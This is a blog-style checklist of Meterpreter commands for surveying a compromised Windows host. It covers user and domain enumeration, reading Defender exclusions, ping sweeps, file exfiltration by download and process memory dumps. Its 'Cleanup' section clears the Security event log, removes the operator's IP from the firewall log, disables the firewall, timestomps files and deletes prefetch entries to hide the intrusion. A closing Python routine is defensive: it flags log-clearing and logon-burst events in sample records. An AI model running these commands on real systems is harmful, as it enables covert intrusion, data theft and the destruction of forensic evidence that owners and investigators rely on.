
---
date: "2017-02-21"
draft: false
title: "Meterpreter Survey - Windows"
---


Init

  1. Situational Awareness
  • getuid # Get the meterpreter current User Id
  • getpid # Get the meterpreter current PID
  • ipconfig # Host Name, IP Address
  • sysinfo # Get the hostname, OS, and architecture of the system
  • ps # Get a list of the currently running processes and check current meterpreter process PID
  • netstat # Get a list of the current connections and listening ports
  • cd c:\\windows\\temp\\ # Change directory to have predictable File System interactions
  • idletime # How long the interactive user has been idle
  • pwd # Print the current working directory
  • ls # List the contents of the current directory
  2. System Date/Time
  • run wmic -c "timezone list brief" # Get the current time zone
  • run wmic -c "os get localdatetime" # Get the current time
  3. Security and Settings
  • run get_env # Show system environment variables
  • run getcountermeasure # Determine if firewall is enabled
  • run multicommand -cl "at","schtasks /query" # List scheduled tasks
  • run wmic -c "startup list" # Get a list of the applications that are set to launch at startup
  • run multicommand -cl "netsh firewall show logging" # Determine if the built-in firewall has logging enabled or disabled
  • run event_manager -i # Show which Windows event logs are available
  • reg enumkey -k "HKLM\\Security\\Policy\\PolAdtEv" # Audit policy settings
  • run uploadexec -e /<PATH_TP>/auditpol.exe -r -v # Upload and run auditpol.exe to display the audit policy

Domains and Users

  1. Domains
  • reg queryval -k "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion" -v productname # OS product name
  • reg queryval -k "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion" -v currentversion # OS version
  • reg queryval -k "HKLM\\system\\currentcontrolset\\services\\tcpip\\parameters" -v "Domain" # DNS domain of the host
  • run wmic -c "computersystem get domain"
  2. Users
  • run enum_logged_on_users -c # Currently logged-on users
  • run wmic -c "netlogin get name,lastlogon,badpasswordcount"

Software

  1. Installed Software
  • run get_application_list
  2. Enumerate Persistence Vectors
  • run wmic -c "startup list"
  • reg enumkey -k "HKLM\\software\\microsoft\\windows\\currentversion\\run"
  • reg enumkey -k "HKCU\\software\\microsoft\\windows\\currentversion\\runonce"
  • reg queryval -k "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" -v "shell" # XP
  • reg queryval -k "HKLM\\software\\microsoft\\windows\\currentversion\\winlogon" -v "shell"
  3. Defender / Security Essentials
  • migrate <PID> # Migrate to a SYSTEM svchost, required for viewing/editing the spynet registry key
  • reg enumkey -k "HKLM\\Software\\Microsoft\\Windows Defender\\spynet"
  • reg enumkey -k "HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions"
  • reg queryval -k "HKLM\\Software\\Microsoft\\Windows Defender\\spynet" -v spynetreporting # 0=no, 1=basic, 2=advanced
  • ls "C:/programdata/microsoft/microsoft antimalware/quarantine/entries" # quarantined files
  • run event_manager -l SYSTEM -f 1001 # last scheduled job
  • cat "c:/windows/temp/MpSigStub.log" # signature update log
  • cat "c:/windows/temp/MpCmdRun.log" # command-line scanner log
  4. Remote Logging
  • run multicommand -cl "netsh advfirewall firewall show rule name=\"Remote Event Log Management (RPC)\""
  • run multicommand -cl "netsh advfirewall firewall show rule name=\"Remote Event Log Management (NP-In)\""
  • run multicommand -cl "netsh advfirewall firewall show rule name=\"Remote Event Log Management (RPC-EPMAP)\""
  • run multicommand -cl "netsh advfirewall firewall show rule name=\"Windows Remote Management (HTTP-In)\""
  5. Dr. Watson

Networking

  1. Local Area Networking
  • run multicommand -cl "ipconfig /all"
  • run multicommand -cl "ipconfig /displaydns"
  • netstat
  2. Network awareness
  • run netenum -ps -r <IPSTART>-<IPEND> # Ping sweep of network range
  • run multicommand -cl "ping -n 2 <IP>"
  3. Internet Settings
  • reg queryval -k "HKCU\\software\\microsoft\\windows\\currentversion\\internet settings" -v ProxyEnable
  • reg queryval -k "HKCU\\software\\microsoft\\windows\\currentversion\\internet settings" -v ProxyServer

Documents and File System interactions

  1. Finding Files
  • search -f *.<EXT> # find all files of type <EXT>
  • search -d "C:\\<PATH>\\<DIR>\\" -f *.<EXT> -r # search a specific <DIR> recursively
  • run multicommand -cl "cmd /c dir c:\\*.<EXT> /S /A"
  • download <FILE> # download for offline analysis (e.g. strings)

Malware

  1. Enumerate processes and handles
  • ps
  • netstat
  • search -f <PROCESS>.exe
  • run multicommand -cl "tasklist /FI \"PID eq <PID>\" /M" # loaded modules of the process
  • upload /<PATH> handle.exe
  • run multicommand -cl "cmd /c handle -p \"<PROCESS>.exe\" -accepteula" # open handles of the process
  • rm C:\\<PATH>\\handle.exe
  • ls
  2. Related files
  • run multicommand -cl "cmd /c dir c:\\windows\\system32\\malicious.file"
  • run multicommand -cl "cmd /c dir c:\\ /S /A | findstr \"MM/DD/YYYY HH:MM\"" # related files by date
  • run multicommand -cl "cmd /c dir c:\\windows\\system32\\drivers /o:d /t:w" # recent drivers
  3. Strings and Memory
  • download <FILE> # download for offline analysis (e.g. strings)
  • run process_memdump -p <PID>

Cleanup

  1. Event Log
  • run event_manager -i
  • run event_manager -l security -f 529 # ms08_067
  • run event_manager -l security -f 680 # ms08_067
  • run event_manager -l system -f 1116 # bcaaa_bof
  • run event_manager -l system -f 1117 # bcaaa_bof
  • run event_manager -c security
  • run event_manager -l security # expect 517 for cleared log
  2. Logs and Dump files
  • run multicommand -cl "cmd /c dir c:\\*.*log /S /A"
  • run multicommand -cl "cmd /c dir c:\\*.*dmp /S /A"
  • search -f *.*dmp
  • ls "c:\\documents and settings\\all users\\application data\\microsoft\\dr watson"
  3. WER
  • ls "c:\\ProgramData\\microsoft\\windows\\wer\\reportarchive"
  • ls "c:\\ProgramData\\microsoft\\windows\\wer\\reportqueue"
  • ls "c:\\ProgramData\\Microsoft\\Windows\\wer\\"
  4. Windows firewall log cleaning
  • run multicommand -cl "netsh advfirewall show currentprofile"
  • run multicommand -cl "netsh advfirewall show allprofiles"
  • run multicommand -cl "netsh advfirewall export \"c:/windows/temp/firewall.wfw\""
  • ls "c:/windows/system32/logfiles/firewall"
  • run multicommand -cl "findstr \"<IP ADDR>\" c:\\windows\\system32\\firewall\\pfirewall.log"
  • cd c:/windows/temp
  • run multicommand -cl "cmd /c findstr /V \"<IP ADDR>\" c:\\windows\\system32\\firewall\\pfirewall.log > c:\\windows\\temp\\fw.tmp"
  • run multicommand -cl "findstr \"<IP ADDR>\" c:\\windows\\temp\\fw.tmp"
  • cat fw.tmp
  • ps
  • run multicommand -cl "netsh advfirewall set currentprofile state off"
  • run multicommand -cl "cmd /c move c:\\windows\\temp\\fw.tmp c:\\windows\\system32\\firewall\\pfirewall.log"
  • timestomp c:\\windows\\system32\\firewall\\pfirewall.log -m "MM/DD/YYYY HH:MM:SS"
  • ls c:\\windows\\system32\\firewall\\pfirewall.log
  • run multicommand -cl "netsh advfirewall import \"c:/windows/temp/firewall.wfw\""
  • run multicommand -cl "netsh advfirewall set currentprofile state on"
  • ls c:\\windows\\system32\\firewall\\pfirewall.log
  5. Prefetch Cleaning
  • cd c:\\windows\\prefetch
  • run multicommand -cl "cmd /c dir /o:d /t:w"
  • rm <FILE>.pf
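The Event Log step of the Cleanup section notes that a cleared Security log leaves event 517 behind, and ties events 529/680 to ms08_067 noise. The Python triage routine below is an added example, not part of the original checklist: it runs over constructed sample records in an assumed "timestamp,log,event_id" export format and flags both the log-cleared marker (517 on XP/2003, 1102 on Vista and later) and a burst of 529/680 logon events; the window and burst thresholds are assumptions.

```python
from collections import namedtuple
from datetime import datetime, timedelta

# Security-log event IDs named in the checklist above. 1102 is added here as
# the Vista-and-later equivalent of the XP/2003 "audit log cleared" event 517.
LOG_CLEARED = {517, 1102}
AUTH_NOISE = {529, 680}   # failed logon / NTLM logon attempt (ms08_067 noise)

Record = namedtuple("Record", "time log event_id")

# Constructed sample export in an assumed "timestamp,log,event_id" format.
SAMPLE_LOG = """\
2017-02-21 10:03:11,Security,680
2017-02-21 10:03:12,Security,529
2017-02-21 10:03:12,Security,680
2017-02-21 10:03:13,Security,529
2017-02-21 10:09:40,Security,517
2017-02-21 10:10:02,System,7036
"""


def parse_records(text):
    """Parse 'YYYY-MM-DD HH:MM:SS,log,event_id' lines into Record tuples."""
    records = []
    for line in text.strip().splitlines():
        stamp, log, event_id = line.split(",")
        records.append(Record(datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S"),
                              log.strip().lower(), int(event_id)))
    return records


def triage_security_log(records, window=timedelta(minutes=5), burst=3):
    """Return (kind, time, detail) findings from Security-log records.

    kind is 'log_cleared' (detail = event id) when a clear marker is seen,
    or 'auth_burst' (detail = count) when at least `burst` 529/680 events
    fall inside one `window`. A freshly cleared log starts with its own
    clear event, so that event's time also bounds what was wiped.
    """
    security = [r for r in records if r.log == "security"]
    findings = [("log_cleared", r.time, r.event_id)
                for r in security if r.event_id in LOG_CLEARED]
    noise = sorted(r.time for r in security if r.event_id in AUTH_NOISE)
    for i, start in enumerate(noise):
        inside = [t for t in noise[i:] if t - start <= window]
        if len(inside) >= burst:
            findings.append(("auth_burst", start, len(inside)))
            break
    return findings
```

On a live host the same records would come from an exported Security log (for example via wevtutil or forwarded events), which is also where a defender sees the clear marker the checklist expects.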